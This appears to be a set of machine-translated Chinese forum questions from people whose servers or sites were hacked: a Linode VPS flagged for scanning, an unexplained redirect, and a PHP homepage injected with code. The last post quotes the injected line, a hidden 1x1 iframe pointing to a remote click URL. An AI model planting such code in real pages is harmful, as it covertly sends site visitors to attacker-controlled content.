我正在使用 linode 虚拟服务器。我的机器是 Ubuntu 10.04。
我从 Linode 那里得到了一张票,他们检测到来自我的服务器的恶意活动。
“我们检测到您的系统的 IP 地址为,正在扫描我们监控的客户端。这不是一次短暂的攻击,而是一次长时间的扫描和/或探测,旨在发现并侵入目标网络。”
现在我在 linode 上托管以测试应用程序,我不知道如何管理和保护服务器。
请有人给我一些关于我应该如何调查这个问题以及如何解决它的线索。
谢谢
每当我在浏览器中输入我的 URL 时,它一直指向我
http://fornax.myvnc.com/dev
该 URL 甚至不起作用,我的防病毒软件也没有抱怨它,所以我不确定发生了什么。我在 godaddy 登录了我的域管理器,它说名称服务器指向:
NS46.DOMAINCONTROL.COM
而且我也不确定这是从哪里来的,因为我的主机是使用其名称服务器的 lunarpages
NS1.LUNARMANIA.COM
我尝试查看我的 .htaccess 并且它是空白的。我的 index.php 被一些恶意代码劫持,所以我完全删除了它。现在一切都应该是正常的,但仍然会发生某种重定向,我不确定这是在哪里发生的。有什么建议么?
可能重复:
我的服务器被黑了 紧急
有人入侵我们的网站,并在我们的主页 (index.php):: 下面的代码中插入以下行,bottom.php 是我们自己的文件,入侵者"echo <iframe .... >;"在我们的“include_once”代码之间放置了行。
<?include_once('bottom.php'); echo "<iframe src=\"http://clydaib.net/?click=86B26\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>"; ?>
请帮助我防止这种侵入。
PHP 版本 5.2.9,系统:Linux hansens 2.4.32-grsec-opteron-peon-1.1.1 #1 SMP Fri Dec 21 15:45:17 PST 2007 i686